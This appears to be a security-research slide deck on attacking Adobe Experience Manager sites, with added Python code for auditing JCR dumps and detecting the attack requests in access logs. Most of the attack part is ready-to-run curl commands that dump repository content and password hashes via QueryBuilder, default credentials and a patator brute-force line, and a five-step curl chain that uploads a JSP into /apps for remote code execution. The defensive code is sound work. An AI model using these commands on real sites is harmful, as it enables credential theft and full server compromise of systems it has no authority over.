
Hack1ng Adobe Experience Manager sites

Who is that guy?


Mikhail Egorov
Security researcher
Works in Odin (Parallels)
0ang3el (at) gma1l (d0t) com

Related Work
http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
http://www.slideshare.net/CQCON/prsentation-ben-zahler
https://docs.adobe.com/docs/en/aem/6-0/administer/security/securitychecklist.html

What do we want?
Sensitive information from JCR
Installed OSGI bundles
Custom scripts
Usernames
Password hashes
Elements that allow anonymous modification

Sensitive information from JCR


Use JsonRendererServlet
curl -X GET http://127.0.0.1:8080/.json
curl -X GET http://127.0.0.1:8080/.6.json
curl -X GET http://127.0.0.1:8080/.tidy.6.json
curl -X GET http://127.0.0.1:8080/.tidy.infinity.json

Installed OSGI bundles


List of all bundles
curl -X GET http://127.0.0.1:8080/bin.tidy.infinity.json

QueryBuilder is your friend!


http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html

curl -X GET http://127.0.0.1:8080/bin/querybuilder.json

Custom scripts
List custom scripts
curl -X GET http://127.0.0.1:8080/apps.tidy.infinity.json

List compiled custom scripts from the cache
curl -X GET http://127.0.0.1:8080/var/classes.tidy.infinity.json

Usernames
Dump content node properties
curl -X GET http://127.0.0.1:8080/content.infinity.json

Use a regular expression to extract usernames (pipe with the previous command); every property ending in "By" (jcr:createdBy, jcr:lastModifiedBy, ...) carries a principal name
python3 -c 'import sys,re; print("\n".join(m.group(1) for m in re.finditer("\".+?By\":\"(.+?)\"", sys.stdin.read())))' | sort -u

Password hashes
Use the QueryBuilder bundle (the URL is quoted so the shell does not treat & as a job separator)
curl -X GET "http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100"

Anonymous modification
Dump content node properties
curl -X GET http://127.0.0.1:8080/content.infinity.json

Use a regular expression to check (pipe with the previous command); a node created or modified by "anonymous" means unauthenticated writes were possible at that path
python3 -c 'import sys,re; m = re.search("\".+?By\":\"anonymous\"", sys.stdin.read()); print("Anon modification:", "Yes" if m else "No")'
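The two regex one-liners above scan the raw JSON text and only its first line. The following is an added example, not from the slides, that parses the same .infinity.json dump as JSON and walks the node tree: it collects every principal named in a *By property and lists the paths that anonymous created or modified, which is exactly what a site owner would want to audit before concluding that no anonymous write is possible. The dump embedded below is constructed to show the shape of the servlet output; the function names are mine.

```python
import json
from typing import Any, Dict, Iterator, List, Set, Tuple

# Constructed sample in the shape the JsonRendererServlet returns for
# /content.infinity.json: child nodes are nested objects, properties are
# scalars or lists. Not captured from a real instance.
SAMPLE_DUMP: Dict[str, Any] = json.loads("""
{
  "jcr:primaryType": "sling:OrderedFolder",
  "jcr:createdBy": "admin",
  "site": {
    "jcr:primaryType": "cq:Page",
    "jcr:createdBy": "admin",
    "jcr:content": {
      "jcr:primaryType": "cq:PageContent",
      "jcr:lastModifiedBy": "author",
      "cq:lastReplicatedBy": "admin"
    },
    "comments": {
      "jcr:primaryType": "sling:Folder",
      "jcr:createdBy": "admin",
      "c1": {
        "jcr:primaryType": "nt:unstructured",
        "jcr:createdBy": "anonymous",
        "jcr:lastModifiedBy": "anonymous",
        "text": "hello"
      }
    }
  }
}
""")


def walk_nodes(node: Dict[str, Any], path: str = "/content") -> Iterator[Tuple[str, Dict[str, Any]]]:
    """Yield (path, properties) for every node in a Sling JSON dump.

    A child node is any value that is itself a JSON object; everything
    else (strings, numbers, lists) is a property of the current node.
    """
    props = {k: v for k, v in node.items() if not isinstance(v, dict)}
    yield path, props
    for name, value in node.items():
        if isinstance(value, dict):
            yield from walk_nodes(value, f"{path}/{name}")


def extract_usernames(dump: Dict[str, Any]) -> Set[str]:
    """Collect every principal recorded in a property ending in "By"
    (jcr:createdBy, jcr:lastModifiedBy, cq:lastReplicatedBy, ...), the
    same idea as the regex on the slide, independent of line layout."""
    users: Set[str] = set()
    for _, props in walk_nodes(dump):
        for key, value in props.items():
            if key.endswith("By") and isinstance(value, str):
                users.add(value)
    return users


def anonymous_modified_paths(dump: Dict[str, Any]) -> List[str]:
    """Paths of nodes that anonymous created or last modified. Each one is
    a location where unauthenticated writes are (or were) permitted and
    should be checked against the intended ACLs."""
    hits: List[str] = []
    for path, props in walk_nodes(dump):
        if any(k.endswith("By") and v == "anonymous" for k, v in props.items()):
            hits.append(path)
    return hits


if __name__ == "__main__":
    print("users:", sorted(extract_usernames(SAMPLE_DUMP)))
    print("anonymous writes:", anonymous_modified_paths(SAMPLE_DUMP))
```

To run it on a real dump, replace SAMPLE_DUMP with json.load(sys.stdin) and pipe the curl output into the script; because the walker records the full path of each hit, the output tells you which ACL to fix rather than just "Yes".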

Getting access
Try default user credentials: admin/admin, author/author, anonymous/anonymous
Offline attack (brute-force the hashes)
Online attack (against the POST servlet bundle)
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5

You have access, now what?


XSS
Not covered, sorry!
CSRF
DoS
Read local files
RCE

Webdav bundle, XXE


CVE-2015-1833 (http://seclists.org/oss-sec/2015/q2/518)
The WebDAV OSGi bundle uses an XML parser that is not properly initialized
Exploit - https://www.exploit-db.com/exploits/37110/

Webdav bundle, XXE


Out-of-band exploitation
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Pros: works with anonymous credentials
Cons: you need an external server, unstable

In-band exploitation
Pros: you do not need an external server, more stable
Cons: you need the credentials of a user that is able to modify some node in the JCR

Webdav bundle, XXE Demo

http://www.youtube.com/watch?v=Hg3AXoG89Gs

Remote code execution


We have node http://127.0.0.1:8080/rce
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}

We have script exec.jsp that is magically loaded into node http://127.0.0.1:8080/apps/rcetype
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}

When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed.

Remote code execution

Step I: Create rcetype node
curl -u admin:admin -F jcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype

Step II: Upload script exec.jsp to rcetype node
curl -u admin:admin -F exec.jsp=@RCE.jsp http://127.0.0.1:8080/content/rcetype

Step III: Copy rcetype to /apps
curl -u admin:admin -F :operation=copy -F :dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype

Step IV: Create rce node bound to rcetype
curl -u admin:admin -F sling:resourceType=rcetype http://127.0.0.1:8080/content/rce

Step V: Launch jsp script
curl -X GET http://127.0.0.1:8080/content/rce.exec
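Every request in this deck, from the JsonRendererServlet dumps and the QueryBuilder password query to the Sling POST servlet copy into /apps, leaves a distinctive line in the Dispatcher or AEM access log. As an added example, not part of the slides, here is a small detector over constructed combined-format log lines that flags those patterns; the rule names, addresses and timestamps are mine. Sling accepts :operation and :dest either as form fields or as query parameters; form bodies never reach an access log, so the copy rule only fires when they are passed in the query string, while the anonymous-POST rule has no such blind spot.

```python
import re
from typing import List, NamedTuple, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache/Dispatcher combined-format lines, not from a real site.
# The third field is the authenticated user; "-" means anonymous.
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2015:21:20:01 +0300] "GET /content/site/en.html HTTP/1.1" 200 5120
10.0.0.9 - - [03/May/2015:21:20:05 +0300] "GET /.tidy.infinity.json HTTP/1.1" 200 987654
10.0.0.9 - - [03/May/2015:21:20:07 +0300] "GET /apps.tidy.infinity.json HTTP/1.1" 200 45000
10.0.0.9 - - [03/May/2015:21:20:09 +0300] "GET /content.infinity.json HTTP/1.1" 200 3200000
10.0.0.9 - - [03/May/2015:21:21:00 +0300] "GET /bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100 HTTP/1.1" 200 2100
10.0.0.9 - admin [03/May/2015:21:24:38 +0300] "POST /content/rcetype HTTP/1.1" 201 430
10.0.0.9 - admin [03/May/2015:21:24:40 +0300] "POST /content/rcetype?:operation=copy&:dest=/apps/rcetype HTTP/1.1" 200 310
10.0.0.7 - - [03/May/2015:21:30:00 +0300] "POST /content/site/comments HTTP/1.1" 201 300
10.0.0.5 - - [03/May/2015:21:31:00 +0300] "GET /content/site/en.6.json HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


class Finding(NamedTuple):
    line_no: int
    client: str
    rule: str
    target: str


def sling_selectors(path: str) -> Tuple[List[str], str]:
    """Split the last path segment Sling-style into (selectors, extension),
    e.g. /content.tidy.infinity.json -> (['tidy', 'infinity'], 'json')."""
    parts = path.rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return [], ""
    return parts[1:-1], parts[-1]


def classify(method: str, user: str, target: str) -> List[str]:
    """Return the rule names a single request line triggers (possibly none)."""
    url = urlsplit(target)
    path = unquote(url.path)
    query = parse_qs(url.query)          # parse_qs percent-decodes values itself
    selectors, ext = sling_selectors(path)
    rules: List[str] = []
    # Deep JSON renderer dumps: .infinity.json, .tidy.*.json or a numeric depth.
    if ext == "json" and any(s in ("infinity", "tidy") or s.isdigit() for s in selectors):
        rules.append("json_tree_dump")
    # QueryBuilder servlet; asking for rep:User or rep:password is a credential pull.
    if path.startswith("/bin/querybuilder"):
        rules.append("querybuilder")
        props = " ".join(query.get("p.properties", []))
        if "rep:password" in props or query.get("type") == ["rep:User"]:
            rules.append("credential_query")
    if method == "POST":
        if user == "-":
            rules.append("anonymous_post")
        dest = query.get(":dest", [""])[0]
        # Sling POST servlet copy/move whose destination is a code path.
        if query.get(":operation", [""])[0] in ("copy", "move") and dest.startswith(("/apps", "/libs")):
            rules.append("code_path_write")
    return rules


def scan(log_text: str) -> List[Finding]:
    """Run classify() over every parseable line and collect the hits."""
    findings: List[Finding] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in classify(m["method"], m["user"], m["target"]):
            findings.append(Finding(n, m["client"], rule, m["target"]))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no:>3} {f.client:<10} {f.rule:<17} {f.target}")
```

The numeric-depth rule will also match a site's own JavaScript fetching en.6.json, so in practice it is tuned per site or restricted to requests from outside the author network; the infinity, tidy, querybuilder and /apps-destination rules have no legitimate use from an anonymous publish client and can be alerted on (or, better, denied at the Dispatcher) as they stand.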

Remote code execution, Demo

http://www.youtube.com/watch?v=Z9n2T07e6Ls
